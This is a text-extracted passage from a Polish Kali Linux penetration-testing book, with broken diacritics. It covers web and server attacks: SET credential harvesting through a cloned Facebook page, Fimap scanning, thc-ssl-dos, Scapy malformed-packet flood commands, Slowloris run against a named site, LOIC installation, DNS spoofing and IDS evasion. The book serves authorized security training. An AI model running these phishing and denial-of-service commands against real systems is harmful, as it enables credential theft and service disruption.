Przechwytywanie hase mdash pakiet SETW rozdziale 4 omoacutewili my pokroacutetce podstawowe mo liwo ci pakietu SET (ang Social Engi-neer Toolkit) W tym podrozdziale powroacutecimy do tego pakietu i skoncentrujemy si na zagad-nieniach zwi zanych z wykorzystywaniem go do gromadzenia hase dost pu oraz przechwy-tywania innych poufnych informacji

Jak pami tasz aby uruchomi pakiet SET powiniene w g oacutewnym menu systemu przej do gru-py Kali Linux a nast pnie wybra polecenie Exploitation ToolsSocial Engineering Toolsse-toolkit

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

250

Przed pierwszym uruchomieniem pakietu upewnij si e dokona e jego aktualizacji do najnow-szej wersji Szczegoacute ow instrukcj jak krok po kroku przeprowadzi aktualizacj pakietu SETznajdziesz w rozdziale 4

Kiedy pakiet SET zako czy klonowanie wybranej witryny internetowej mo e j uruchomi na w asnymserwerze WWW Bardzo wa nym elementem ataku jest przekonanie u ytkownika b d cego celem abypo czy si z kopi witryny dzia aj c na Twoim w asnym serwerze Oznacza to e do atakoacutew na celew internecie b dziesz musia u y maszyny posiadaj cej publiczny adres IP Oproacutecz tego b dziesz musiautworzy odpowiednie regu y dla zapory sieciowej tak aby zdalni u ytkownicy mogli si po czy z ze-wn trz z Twoim serwerem

Po zako czeniu konfiguracji ustawie adresoacutew IP i regu zapory sieciowej nadszed czas nauruchomienie pakietu SET

Tym razem pakietu SET b dziemy u ywa do przechwytywania i zbierania hase dost pu Jakpami tasz SET posiada mechanizmy pozwalaj ce na sklonowanie praktycznie dowolnie wybranejwitryny internetowej W naszym przyk adzie wykorzystamy pakiet SET do sklonowania witrynyjednego z najpopularniejszych serwisoacutew spo eczno ciowych Po uruchomieniu pakietu musisz za-akceptowa wszystkie warunki umowy licencyjnej tak jak zaprezentowano na rysunku na na-st pnej stronie

Po uruchomieniu pakietu SET warto od czasu do czasu wybra z menu g oacutewnego opcj 5) Update theSocial-Engineer Toolkit ktoacutera sprawdzi czy korzystasz z najnowszej wersji pakietu Je eli oka e si enie zostan zainstalowane odpowiednie aktualizacje Je eli po wybraniu tej opcji wy wietli si komuni-kat o b dzie informuj cy e repozytoria GIT nie istniej to prawdopodobnie pakiet GIT nie jest zainstalowa-ny lub zosta zainstalowany niepoprawnie (zawsze istnieje roacutewnie ryzyko e co si zmieni o w ca ejprocedurze od czasu kiedy powstawa a ta ksi ka) Wi cej szczegoacute owych informacji i wskazoacutewek na tematu ytkowania pakietu SET w systemie Kali Linux znajdziesz na blogach autoroacutew ksi ki Amira Lakhaniego(zobacz stron httpwwwDrChaoscom) lub Josepha Muniza (zobacz stron httpwwwthesecurity

bloggercom)

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

251

1 Gdy zako czy si aktualizacja pakietu SET do najnowszej wersji z menu g oacutewnegowybierz opcj 1) Social-Engineering Attacks

2 Teraz wybierz opcj 2) Website Attack Vectors 3 Wybierz opcj 3) Credential Harvester Attack Method

Do wyboru masz teraz kilka opcji okre laj cych sposoacuteb klonowania wybranej witryny PakietSET posiada swoje w asne wbudowane szablony dla popularnych witryn takich jak Facebookczy Gmail Czasami u ycie szablonu nie jest najlepszym rozwi zaniem aczkolwiek na pocz tekpowinno w zupe no ci wystarczy Je eli zamiast szablonu chcesz u y kopii wybranej witry-ny internetowej musisz poda jej adres URL mdash pakiet SET rozpocznie proces klonowania

Je eli posiadasz ju wykonan wcze niej kopi witryny lub samodzielnie utworzy e odpowiedniepliki HTML mo esz wybra opcj 3) Custom Import Po wybraniu tej opcji b dziesz moacutegwskaza lokalizacj plikoacutew HTML ktoacuterych chcesz u y

W naszym przyk adzie u yjemy gotowych szablonoacutew witryn internetowych Pakiet SET poprosio podanie adresu IP na ktoacuterym b dzie nas uchiwa nadchodz cych da mdash w tym przypadkub dzie to adres IP interfejsu sieciowego naszego systemu Kali Linux Wyj tkiem od tej regu ymo e by sytuacja kiedy wykorzystujesz us ug NAT zapory sieciowej W takim przypadkuzamiast lokalnego adresu IP systemu Kali Linux powiniene u y publicznego adresu IP hostaus ugi NAT tak aby klienty z zewn trz mog y czy si z Twoim systemem W naszym przy-k adzie u yjemy adresu IP interfejsu p tli zwrotnej 127001

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

252

Kiedy zdefiniujesz adres IP pakiet SET poprosi Ci o wybranie szablonu W naszym przy-padku wybierzemy opcj Facebook

Na kolejnym rysunku przedstawiono okno przegl darki po czonej z serwerem o adresie127001 i wy wietlaj cej nasz fa szyw stron portalu Facebook Je eli wy wietlona stronanie wygl da przekonuj co mo esz u y innego szablonu albo po prostu sklonowa aktualnwersj danej strony

Zwroacute uwag e w pasku adresu przegl darki wy wietlany jest adres 127001 W wi kszo ciprzypadkoacutew b dziesz musia jednak u y nieco bardziej wyrafinowanych wektoroacutew atakuaby przekona u ytkownikoacutew do odwiedzenia Twojej spreparowanej strony internetowejMo esz to zrobi na wiele sposoboacutew na przyk ad poprzez rozsy anie do u ytkownikoacutew pocztelektroniczn specjalnie przygotowanej wiadomo ci zawieraj cej cze do Twojej spreparowanejwitryny internetowej (zobacz pierwszy rysunek na nast pnej stronie)

Kiedy u ytkownik rozpocznie wpisywanie nazwy konta i has a dost pu na naszej fa szywejstronie udaj cej witryn Facebook pakiet SET przechwyci ca y zwi zany z tym ruch sieciowyi nast pnie przekieruje u ytkownika do prawdziwej witryny internetowej Istnieje bardzo du-a szansa na to e po takim przekierowaniu u ytkownik b dzie przekonany e po prostu po-

myli si podczas wpisywania has a i zaloguje si jeszcze raz nie maj c wiadomo ci e bdquopodrodzerdquo pakiet SET przechwyci nazw jego konta i has o dost pu (zobacz drugi rysunek nanast pnej stronie)

Jak wida na powy szym rysunku pakiet SET przechwyci nazw naszego konta u ytkownikaDrChaos i nasze has o dost pu ILoveKali

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

253

Po zako czeniu tego wiczenia u yj kombinacji klawiszy Ctrl+C aby zako czy prac programuSET i wygenerowa raport w formacie HTML SET generuje profesjonalnie wygl daj cy ra-port ktoacuterego mo esz z powodzeniem u y podczas tworzenia raportu ko cowego z przepro-wadzonego testu penetracyjnego

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

254

Fimap

Fimap to narz dzie napisane w j zyku Python przeznaczone do wyszukiwania i wykorzysty-wania podatno ci i luk w zabezpieczeniach aplikacji internetowych pozwalaj cych na przeprowa-dzanie atakoacutew typu LFI (ang Local File Inclusion) lub RFI (ang Remote File Inclusion)

Aby uruchomi pakiet Fimap w systemie Kali Linux przejd do grupy Kali Linux a nast pniewybierz polecenie Web ApplicationsWeb Vulnerability Scannersfimap Po wybraniu tegopolecenia na ekranie pojawi si nowe okno terminala z wy wietlonym ekranem powitalnympolecenia fimap Dla pakietu fimap istnieje roacutewnie kilka dodatkowych wtyczek ktoacutere mo eszpobra z internetu i zainstalowa za pomoc nast puj cego polecenia

fimap --install -plugins

Dost pne wtyczki zostan wy wietlone w formie listy z opcj pozwalaj c na zainstalowaniewybranej wtyczki lub zako czenie dzia ania polecenia Jak wida w naszym przyk adzie do-st pne s dwie dodatkowe wtyczki st d polecenie instalowania musimy wykona dwukrotnieindywidualnie instaluj c poszczegoacutelne wtyczki (zobacz pierwszy rysunek na nast pnej stronie)

Aby u y pakietu Fimap musisz najpierw poda adres URL witryny ktoacutera b dzie celem skaneraIstnieje wiele metod definiowania adresoacutew URL Mo esz na przyk ad poda jeden wybrany adresURL ca list adresoacutew URL mo esz u y wyszukiwarki Google do zebrania adresoacutew URL

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

255

ale roacutewnie dobrze mo esz u y innych metod takich jak zbieranie wszystkich adresoacutew URLz hiper czy zamieszczonych na danej stronie internetowej czy pozyskiwanie adresoacutew URL z for-mularzy i nag oacutewkoacutew stron W naszym przypadku celem skanera b dzie witryna httpwwwthesecuritybloggercom

Aby uruchomi skanowanie witryny httpwwwthesecuritybloggercom powiniene wpisanast puj ce polecenie

fimap -u httpwwwthesecuritybloggercom

Pakiet Fimap rozpocznie skanowanie i sproacutebuje automatycznie wykry podatno ci na atakitypu LFIRFI Na rysunku przedstawionym poni ej wida jednak e witryna wwwthesecurity

bloggercom jest odporna na tego typu ataki

Ataki typu DoSW zdecydowanej wi kszo ci przypadkoacutew celem przeprowadzania testoacutew penetracyjnych jestidentyfikacja potencjalnych i rzeczywistych podatno ci i luk w zabezpieczeniach bez umy l-nego zak oacutecania dzia ania atakowanego systemu i bez robienia mu krzywdy w jakikolwiek in-ny sposoacuteb Jest to kluczowy element odroacute niaj cy autoryzowanego pentestera od z o liwegonapastnika maj cego niecne zamiary Prawdziwy napastnik nie przestrzega adnych regu

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

256

i nie zwraca uwagi na to czy jego dzia ania spowoduj zak oacutecenia w funkcjonowaniu atako-wanego systemu je eli tylko takie post powanie b dzie dla niego korzystne Czasami zdarzasi nawet e napastnik b dzie wr cz za wszelk cen szuka mo liwo ci zak oacutecenia dzia aniaczy nawet ca kowitego wy czenia atakowanego systemu Z tego powodu w niektoacuterych przypad-kach przeprowadzenie testoacutew odporno ci danej witryny czy aplikacji internetowej na ataki typuDoS (ang Denial of Service) mo e by bardzo po dane Testy tego rodzaju cz sto s nazywanetestami warunkoacutew skrajnych lub testami odporno ci na przeci enie systemu (ang stress testing)

Jedn z najwa niejszych spraw zwi zanych z testami odporno ci na ataki typu DoS jest bezwzgl dne uzyska-nie pisemnej zgody w a ciciela systemu na przeprowadzanie takich atakoacutew Niektoacutere metody atakoacutewmog mie negatywny wp yw na funkcjonowanie systemu nawet po zako czeniu testoacutew Dobrym roz-wi zaniem jest przeprowadzanie takich testoacutew na systemach z redundancj systemach nieprodukcyj-nych czy systemach zainstalowanych w rodowisku laboratoryjnym o ile to oczywi cie mo liwe

Najcz ciej spotykana metoda ataku DoS polega na bdquozalewaniurdquo badanego systemu masowonap ywaj cymi z zewn trz daniami Takie przeci enie zazwyczaj skutecznie uniemo liwiasystemowi odpowiadanie na rzeczywiste dania od autoryzowanych klientoacutew lub co najmniejtak spowalnia wysy anie odpowiedzi e ca y system staje si dla klientoacutew praktycznie bezu-yteczny Ataki typu DoS mog by skierowane na zasoby systemu (np przypisana przestrze

dyskowa przepustowo po cze sieciowych itd) konfiguracj systemu (np usuwanie tablicroutingu) informacje o stanie systemu (np resetowanie sesji TCP) oraz ka dy inny elementrodowiska systemu ktoacuterego przeci enie mo e spowodowa zak oacutecenie jego normalnego

funkcjonowania

Roacute nica pomi dzy atakami DoS (ang Denial of Service) a DDoS (ang Distributed Denial of Service) polega natym e do przeprowadzania ataku DoS napastnik wykorzystuje tylko jeden komputer podczas gdy w przy-padku atakoacutew DDoS liczba maszyn bior cych udzia w ataku mo e si ga tysi cy Omawianie zagadniezwi zanych z atakami DDoS wykracza niestety daleko poza ramy naszej ksi ki

Istniej cztery g oacutewne kategorie atakoacutew DoSDDoS Ataki wykorzystuj ce przeci enie po cze sieciowych (ang Volume Based

Attacks) mdash taki rodzaj ataku jest zwi zany z bdquozalewaniemrdquo atakowanego systemumasowo nap ywaj cymi pakietami UDP ICMP i innymi Celem takiego ataku jestprzeci enie po cze sieciowych atakowanego systemu nadmiernymi ilo ciamiprzesy anych pakietoacutew

Ataki na protoko y komunikacyjne (ang Protocol Attacks) mdash ataki te maj na celunadmierne wykorzystywanie zasoboacutew urz dze sieciowych takich jak routeryzapory sieciowe urz dzenia roacutewnowa ce obci enie po cze sieciowychPrzyk adami atakoacutew na protoko y komunikacyjne s ataki typu SYN floodPing of Death Smurf Teardrop wymuszanie fragmentacji pakietoacutew itp

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

257

Ataki na warstw aplikacji (ang Application Layer Attacks) mdash takie ataki wykorzystujnormalny ruch sieciowy do zak oacutecenia dzia ania lub nawet spowodowania awariidanej witryny lub aplikacji internetowej Przyk adami mog by ataki typu Zero-Dayczy ataki wykorzystuj ce inne podatno ci i luki w zabezpieczeniach witryn i aplikacjiinternetowych

Ataki powoduj ce wyczerpanie zasoboacutew sesji (ang Session Exhaustion) mdash takieataki powoduj wyczerpanie liczby dozwolonych jednocze nie sesji poprzez ci g enawi zywanie nowych po cze bez zamykania starych sesji co prowadzido wyczerpania zasoboacutew systemu

W systemie Kali Linux znajdziesz wiele narz dzi pozwalaj cych na wykorzystywanie podat-no ci i luk w zabezpieczeniach Narz dzia te na przyk ad Metasploit mog by u ywane doprzeprowadzania atakoacutew DoS na warstw aplikacji (wiele z tych narz dzi omawiali my ju wewcze niejszych rozdzia ach) W rozdziale 3 prezentowali my popularne narz dzie Scapypozwalaj ce na przeprowadzanie atakoacutew DoS na protoko y komunikacyjne Poni ej znaj-dziesz omoacutewienie kilku kolejnych narz dzi s u cych do przeprowadzania atakoacutew DoS ktoacuteremo esz znale w systemie Kali Linux

Aby przetestowa skuteczno ataku DoS mo esz u y witryny httpwwwupordownorg ktoacutera sprawdzadost pno podanej witryny internetowej

THX-SSL-DOSProtokoacute SSL (ang Secure Socket Layer) jest u ywany do nawi zywania bezpiecznych po -cze i transakcji w internecie Nawi zanie bezpiecznego po czenia z wykorzystaniem proto-ko u SSL wymaga u ycia po stronie serwera 15 razy wi kszej mocy obliczeniowej ni po stro-nie klienta Atak typu THC-SSL-DOS wykorzystuje t dysproporcj przez proacuteb prze adowaniaserwera spreparowanymi daniami nawi zania sesji SSL a do momentu kiedy przeci onyserwer si poddaje i przestaje odpowiada na dania przesy ane od innych autoryzowanychklientoacutew Atak wykorzystuje mechanizm renegocjacji bezpiecznego po czenia SSL do gene-rowania tysi cy takich da dla pojedynczego po czenia TCP Z tego powodu atak ten jestroacutewnie znany jako atak typu SSL-Exhaustion (ang mdash bdquowyczerpanie zasoboacutew SSLrdquo) Zalettakiego podej cia jest to e mo liwo ci przetwarzania da nawi zania sesji SSL s znaczniewy sze po stronie klienta co oznacza e przeci tny laptop pod czony do sieci za po red-nictwem cza o przeci tnej szybko ci mo e rzuci powa ne wyzwanie niemal ka demu serwero-wi aplikacji internetowych Podatno serweroacutew internetowych na ataki typu SSL-Exhaustionjest powszechnie znana a mimo to nie uda o si jeszcze opracowa skutecznej metody zapo-biegania takim atakom

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

258

Aby uruchomi pakiet THC-SSL-DOS w menu g oacutewnym systemu przejd do grupy Kali Linuxa nast pnie wybierz polecenie Stress TestingWeb Stress Testingthc-ssl-dos Po wybraniu pole-cenia pojawi si nowe okno terminala z ekranem powitalnym polecenia thc-ssl-dos Sk adniapolecenia jest nast puj ca

thc-ssl-dos [opcje] ltadres IP ofiarygt ltportgt and --accept

W wierszu wywo ania polecenia musisz umie ci opcj --accept w przeciwnym wypadku otrzymaszkomunikat o b dzie przedstawiony poni ej

Po uruchomieniu programu THC-SSL-DOS zobaczysz na ekranie kilka zabawnych komuni-katoacutew informuj cych e dzia anie programu si rozpocz o Na pierwszym rysunku zamiesz-czonym poni ej wida e zaatakowana witryna nie obs uguje protoko u SSL st d programwy wietla na ekranie komunikat o wyst pieniu b du Na kolejnym rysunku przedstawionosytuacj w ktoacuterej pomy lnie rozpocz si proces renegocjacji sesji SSL co w efekcie mo edoprowadzi do zak oacutecenia dzia ania atakowanego systemu Pami taj ataki tego typu mo eszprzeprowadza tylko na systemach dla ktoacuterych uzyska e pisemne zezwolenie w a cicielaPrzeprowadzenie takiego ataku mo e doprowadzi do powa nego ograniczenia funkcjonalno-ci atakowanego systemu lub nawet do jego ca kowitego za amania

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

259

ScapyJednym z najpopularniejszych narz dzi s u cych do przeprowadzania atakoacutew typu DoS jestScapy Program zosta napisany w j zyku Python a jego autorem jest Phillippe Biondi Scapypozwala na tworzenie modyfikowanie i dekodowanie zawarto ci pakietoacutew sieciowych wstrzyki-wanie pakietoacutew do sieci przechwytywanie pakietoacutew oraz dopasowywanie da i odpowiedziProgram posiada roacutewnie wiele innych mechanizmoacutew takich jak skanowanie portoacutew traso-wanie pakietoacutew sprawdzanie urz dze sieciowych przeprowadzanie atakoacutew czy wykrywanieurz dze sieciowych

Jedn z cz sto wykonywanych operacji jest przechwytywanie pakietoacutew TCP i wysy anie ichdalej do sieci za po rednictwem programu Scapy Aby uruchomi ten program w oknie ter-minala wpisz polecenie scapy Po uruchomieniu programu b dziesz moacuteg wykonywa pole-cenia bezpo rednio z jego wiersza polece

W przyk adzie ktoacutery przedstawiamy poni ej sproacutebujemy u y pakietu Scapy do wysy aniaspreparowanych pakietoacutew TCP do naszego serwera testowego W naszym przypadku serwertestowy ma adres IP 10001 ale w realnym scenariuszu mo e to by dowolny router czyserwer WWW Oproacutecz podania adresu atakowanego serwera musimy roacutewnie okre li liczbpakietoacutew ktoacutere zostan wys ane do celu W naszym przypadku b dzie to 2000 pakietoacutew cze-go mo emy dokona za pomoc nast puj cego polecenia

send(IP(dst=10001ttl=0)TCP()iface=eth0count=2000)

Powoduje ono wys anie 2000 pakietoacutew z interfejsu sieciowego eth0 do serwera o adresie10001 Jak zapewne zauwa y e czas ycia wysy anych pakietoacutew (parametr ttl) jest ustawio-ny na warto 0 Z punktu widzenia protoko u TCP istnienie takich pakietoacutew jest niemo liweInaczej moacutewi c wysy aj c pakiety z tak spreparowan warto ci parametru ttl proacutebujemywprowadzi atakowany serwer internetowy co najmniej w zak opotanie W realnym scenariu-szu potencjalny napastnik wysy a by do atakowanego serwera miliony takich pakietoacutew Wartozauwa y e w sprzyjaj cych okoliczno ciach zak oacutecenie pracy czy nawet powa na awaria serweramo e by spowodowana odebraniem nawet jednego niepoprawnego czy specjalnie z o liwiespreparowanego pakietu sieciowego Oczywi cie w zale no ci od zamiaroacutew mo esz dowolniemodyfikowa poszczegoacutelne opcje wysy ania pakietoacutew

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

260

Poni ej przedstawiamy kilkana cie popularnych scenariuszy atakoacutew przeprowadzanych przyu yciu pakietu Scapy

Nieprawid owa wersja protoko u IP

send(IP(dst=10001 src=10203040 version=0) TCP(dport=www) iface=eth0 count=2000)

Nieprawid owa suma kontrolna pakietu TCP

send(IP(dst=10001)TCP(chksum=0x5555)iface=eth0count=2000)

Nieprawid owe flagi pakietu TCP (wszystkie flagi wyzerowane i numer sekwencji usta-wiony na 0)

send(IP(dst=10001)TCP(flags=seq=555)iface=eth0 count=2000)

Nieprawid owe flagi pakietu TCP (wszystkie flagi ustawione jednocze nie)

send(IP(dst=10001)TCP(flags=0x0ff)iface=eth0count=2000)

Ustawiona tylko flaga FIN

send(IP(dst=10001)TCP(flags=F)iface=eth0count=2000)

Rozmiar nag oacutewka wi kszy od rozmiaru pakietu L2

send(IP(dst=10001 src=10203040 ihl=15L)TCP(dport=www) iface=eth0 count=2000)

Zbyt ma y rozmiar nag oacutewka pakietu

send(IP(dst=10001 src=10203040 ihl=2L)TCP(dport=www) iface=eth0 count=2000)

ICMP Flood

send(IP(dst=10001)ICMP()iface=eth0count=2000)

Nieprawid owa suma kontrolna pakietu IP

send(IP(dst=10001 src=10203040 chksum=0x5500) TCP(dport=www) iface=eth0 count=2000)

Fragmentacja pakietoacutew IP

send(IP(dst=10001 src=10203040 frag=1)TCP(dport=www) iface=eth0 count=2000)

Rozmiar pakietu IP wi kszy ni rozmiar pakietu warstwy L2

send(IP(dst=10001 src=10203040 ihl=5L len=80) TCP(dport=www) iface=eth0 count=2000)

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

261

roacuted owy adres IP taki sam jak docelowy adres IP

send(IP(dst=10001 src=10001)TCP(dport=www) iface=eth0 count=2000)

Rozmiar pakietu warstwy L2 wi kszy ni rozmiar pakietu IPsend(IP(dst=10001len=32) Raw(load=bla-bla-bla-bla-bla-blabla-bla)iface=eth0count=2000)send(IP(dst=10001len=32)UDP(dport=80len=48) Raw(load=bla-bla-bla-bla-bla-bla-bla-bla)iface=eth0count=2000)send(IP(dst=10001len=32)ICMP() Raw(load=bla-bla-bla-blabla-bla-bla-bla)iface=eth0count=2000)

Brak pakietu warstwy L4

send(IP(dst=10001 src=10203040) iface=eth0 count=2000)

Jednocze nie ustawione flagi SYN i FIN

send(IP(dst=10001)TCP(flags=FS)iface=eth0count=2000)

Rozmiar nag oacutewka pakietu TCP wi kszy ni rozmiar pakietu warstwy L2

send(IP(dst=10001 src=10203040) TCP(dport=www dataofs=15L) iface=eth0 count=2000)

Zbyt ma y rozmiar nag oacutewka TCP (mniejszy ni 5 bajtoacutew)

send(IP(dst=10001 src=10203040) TCP(dport=www dataofs=1L) iface=eth0 count=2000)

Slowloris

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

262

Slowloris to klient HTTP ktoacutery umo liwia przeprowadzanie atakoacutew typu DoS nawet za po-rednictwem cza o wzgl dnie ma ej przepustowo ci Metoda ataku wykorzystywana w tym

programie jest unikatowa i pozwala na przeprowadzenie skutecznego ataku bez uciekania sido powszechnie wykorzystywanych technik bdquozalewaniardquo serweroacutew masowo wysy anymi pa-kietami Slowloris otwiera wiele roacutewnoleg ych po cze do atakowanego serwera i podtrzy-muje je w otwartym stanie poprzez przesy anie cz ciowych da HTTP Po otwarciu po -czenia program cyklicznie w regularnych odst pach czasu przesy a do serwera setkikolejnych nag oacutewkoacutew da co zapobiega zamkni ciu po czenia przez serwer Takie zacho-wanie powoduje wyczerpanie limitu roacutewnoleg ych sesji serwera co w efekcie uniemo liwiajego normalne dzia anie W przypadku witryn sieciowych przystosowanych do du ego nat -enia ruchu proces przejmowania kolejnych po cze przez pakiet Slowloris mo e zaj nieco

czasu poniewa inni u ytkownicy musz zwalnia swoje po czenia zanim b d one mog yzosta zaj te przez Slowloris Nie zmienia to jednak w niczym faktu e po pewnym czasieSlowloris poma u ale skutecznie przechwyci wszystkie dost pne sesje i doprowadzi do za-wieszenia dzia ania serwera

Program Slowloris dzia a skutecznie zw aszcza w odniesieniu do serweroacutew WWW wykorzy-stuj cych przetwarzanie wielow tkowe ktoacutere s z definicji wra liwe na ograniczanie liczby do-st pnych w tkoacutew Przyk adami takich serweroacutew s Apache 1x i 2x dhttpd GoAhead i inne

Pakiet Slowloris nie jest domy lnie instalowany w systemie Kali Linux 10 ale mo esz go pobra ze stronyhttphackersorgslowloris

Aby uruchomi program pobierz skrypt pl ze strony autora otwoacuterz nowe okno terminalaprzejd do katalogu ze skryptem i wykonaj polecenie przedstawione poni ej

perl slowlorispl

W oknie terminala pojawi si ekran pomocy programu Aby rozpocz atak na wybrany serwerpowiniene wpisa polecenie przedstawione powy ej i doda opcj -dns a po niej wpisa adresserwera b d cego celem ataku Aby zaatakowa na przyk ad witryn wwwthesecuritybloggercompowiniene wpisa nast puj ce polecenie (zobacz pierwszy rysunek na nast pnej stronie)

perl slowlorispl -dns thesecuritybloggercom

Po rozpocz ciu ataku b dziesz moacuteg obserwowa w oknie terminala proces przejmowaniakolejnych po cze co po pewnym czasie mo e doprowadzi do za amania si atakowanegosystemu (zobacz drugi rysunek na nast pnej stronie)

Je eli atak przeprowadzany za pomoc pakietu Slowloris si powiedzie atakowany serwerprzestanie odpowiada na dania (zobacz trzeci rysunek na nast pnej stronie)

Powy ej mo esz zobaczy skutki ataku DoS na witryn httpwwwthesecuritybloggercom (prosimy niepowtarzaj tego eksperymentu)

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

263

LOIC czyli Niskoorbitalne Dzia o JonowehellipPakiet LOIC (ang Low Orbit Ion Cannon czyli wspomniane w tytule podrozdzia u Niskoorbital-ne Dzia o Jonowe) to narz dzie do badania odporno ci zasoboacutew sieciowych na przeci enieLOIC pozwala na sprawdzanie ilo ci ruchu sieciowego jaki mo e obs u y dany system Ta-kie informacje mog by poacute niej wykorzystywane do planowania rozbudowy i wdra ania sze-rokopasmowych po cze sieciowych Program ten sta si inspiracj do utworzenia innych

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

264

narz dzi o podobnej funkcjonalno ci takich jak na przyk ad JavaScript LOIC ktoacutere pozwalau ytkownikowi na przeprowadzanie testoacutew odporno ci na przeci enia po cze bezpo red-nio z poziomu przegl darki

Program LOIC by wykorzystywany przez grup Anonymous do przeprowadzenia s ynnychatakoacutew na wiele znanych internetowych witryn publicznych i rz dowych Niektoacuterzy prawnicyusi uj co prawda przekonywa e zastosowanie narz dzi takich jak LOIC jest w praktycebardzo podobne do odwiedzania danej witryny kilka tysi cy razy ale w wi kszo ci krajoacutewnieautoryzowane u ywanie tego typu narz dzi jest traktowane jako amanie prawa

Aby zainstalowa pakiet LOIC powiniene otworzy okno terminala i wpisa sekwencj po-lece przedstawion poni ej

apt-get updateaptitude install git-core monodevelopapt-get install mono-gmcs

Po zako czeniu tego etapu wykonaj polecenie cd Desktop aby przej do katalogu reprezentuj -cego pulpit a nast pnie utwoacuterz w nim podkatalog o nazwie loic Mo esz to zrobi za pomocpolecenia przedstawionego poni ej

mkdir loic

Przejd do nowo utworzonego katalogu za pomoc polecenia cd loic i wykonaj polecenieprzedstawione poni ej

wget httpsrawgithubcomnicolargoloicinstaller masterloicsh

Nast pnie nadaj skryptowi loicsh odpowiednie uprawnienia Aby to zrobi wykonaj kolejnepolecenie

chmod 777 loicsh

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

265

Ostatnim etapem jest uruchomienie skryptu za pomoc polecenia przedstawionego poni ej

loicsh install

Je eli na ekranie nie pojawi si aden komunikat o wyst pieniu b du to znaczy e jestegotowy do przeprowadzenia aktualizacji naszego bdquodzia a jonowegordquo Aby to zrobi wykonajnast puj ce polecenie

loicsh update

Po zako czeniu aktualizacji nadszed czas na uruchomienie programu LOIC Mo esz to zro-bi wpisuj c w oknie terminala nast puj ce polecenie

loicsh run

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

266

U ywanie programu LOIC nie jest trudne Na pocz tek mo esz wybra czy chcesz korzystaz trybu r cznego (ang manual mode) czy trybu IRC (ang IRC mode) W naszym przyk adziewybrali my tryb r czny

Nast pnie powiniene poda adres URL systemu ktoacutery chcesz zaatakowa W naszym przypadkuwpisali my adres lokalnego interfejsu p tli zwrotnej czyli 127001 Je eli chcesz zmodyfi-kowa domy lne ustawienia ataku LOIC oferuje wiele opcji dla protoko oacutew TCP oraz UDP

Kiedy b dziesz gotowy do rozpocz cia ataku powiniene klikn przycisk IMMA CHARGINMAH LAZER Post py ataku mo esz obserwowa w oknie programu Aby zatrzyma atakkliknij przycisk Stop Flooding

Inne narz dziaKali Linux oferuje inne narz dzia ktoacutere mo esz wykorzysta do przeprowadzania atakoacutew naaplikacje internetowe Poni ej zamieszczamy kroacutetkie zestawienie wybranych narz dzi ktoacuterenie by y do tej pory omawiane

DNSChef

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

267

Pakiet DNSChef to serwer DNS proxy przeznaczony dla pentesteroacutew i specjalistoacutew zajmuj -cych si analiz z o liwego oprogramowania Serwery DNS proxy to narz dzia bdquofa szuj cerdquoodpowiedzi DNS wykorzystywane do analizy ruchu sieciowego generowanego przez aplika-cje internetowe i wielu innych zastosowa DNS (ang Domain Name System) to rozproszonysystem przydzielania nazw zasoboacutew sieciowych takich jak komputery serwery us ugi siecio-we i inne zasoby sieciowe pod czone do internetu lub prywatnych sieci komputerowychCelowe dostarczanie fa szywych adresoacutew DNS mo e powodowa przekierowanie ruchu sie-ciowego do lokalizacji zupe nie innych ni oryginalne

Na przyk ad serwer DNS proxy mo e by wykorzystywany do utworzenia fa szywych odpo-wiedzi DNS powoduj cych e ruch dedykowany dla witryny CzarnyCharaktercom zamiastdo internetu b dzie trafia do lokalnego komputera analityka gdzie mo e by blokowany lubprzechwytywany w celu przeprowadzenia dok adniejszej analizy Aby to zrobi musisz uzy-ska dost p do jednego z serweroacutew DNS i odpowiednio zmodyfikowa wpisy DNS lub doko-na bdquozatruciardquo serwera DNS tak aby ruch sieciowy by przekierowywany do Twojego kom-putera z systemem Kali Linux Sama obs uga narz dzia DNSChef nie jest skomplikowanaaczkolwiek prawdziwym wyzwaniem mo e by atak na serwer DNS i przekierowanie ruchudo Twojego komputera

SniffJoke

SniffJoke pozwala na zupe nie przezroczyste przechwytywanie po cze TCP wprowadzaniedo nich opoacute nie modyfikowanie zawarto ci pakietoacutew oraz wstrzykiwanie fa szywych spre-parowanych pakietoacutew do sesji TCP u ytkownika Powoduje to e pasywne rozwi zania mo-nitoruj ce i zabezpieczaj ce ruch sieciowy takie jak systemy IDSIPS i sniffery maj du eproblemy z poprawn interpretacj po cze sieciowych Dzia anie programu wywo uje roacute -nice mi dzy ruchem sieciowym ktoacutery jest przechwytywany i przewidywany przez sniffera rzeczywistym ruchem sieciowym generowanym przez klienta w rezultacie czego algorytmybuduj ce bdquokonwersacjerdquo sieciowe dla sniffera maj problemy z poprawnym sk adaniem kolej-no ci pakietoacutew Na kolejnych dwoacutech rysunkach przedstawiamy proces przechwytywania ru-chu sieciowego mi dzy dwoma u ytkownikami bez udzia u pakietu SniffJoke oraz w sytuacjikiedy pakiet SniffJoke dzia a

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

268

